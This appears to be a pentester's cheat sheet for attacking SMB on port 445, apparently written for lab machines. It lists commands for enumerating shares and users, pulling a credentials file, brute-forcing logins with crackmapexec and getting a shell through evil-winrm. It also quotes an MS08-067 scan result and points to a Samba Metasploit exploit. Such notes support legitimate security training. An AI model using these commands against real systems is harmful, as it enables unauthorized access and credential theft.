445 SMB

username enum:

nmap --script "safe or smb-enum-*" -p 445 IP

smbmap -H 10.129.1.225

Looks like we can read from general and Development.

smbmap -H 10.129.1.225 -R --depth 5

Running this will go in those directories and discover files.

smbclient //10.129.1.225/general

and download the file (get creds.txt)

creds.txt content

Share with space

smbclient "\\\\IP\\Bob Share" --no-pass

Brute Forcing SMB

  1. Create a user name list and a password list after initial enumeration. i.e) use cewl or hashcat for password list.

cme smb IP -u users.txt -p pass.txt --continue-on-success

Utilizing rpcclient to login

rpcclient -U user IP 

once you get in you can perform these commands

enumdomusers #get all the usernames 
queryuser [0x40] (enter rid) 
enumprinters 

Using cme winrm to check if it gets pwned > evil-winrm to get a shell.

cme winrm IP -u user -p 'PASS'
smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)

only need to change the rhost to exploit it.

Changing smb password with smbpasswd

if you get the status (NT_STATUS_PASSWORD_MUST_CHANGE) after entering correct credentials, you can set a new password with this command.

smbpasswd -U user -r IP

OLD SMB SERVICE?

#Server requested LANMAN password (share-level security) but 'client lanman auth = no' or 'client ntlmv2 auth = yes'
#In the /etc/samba/smb.conf file to be able to connect to those old servers.
client lanman auth = yes
client ntlmv2 auth = no

Last updated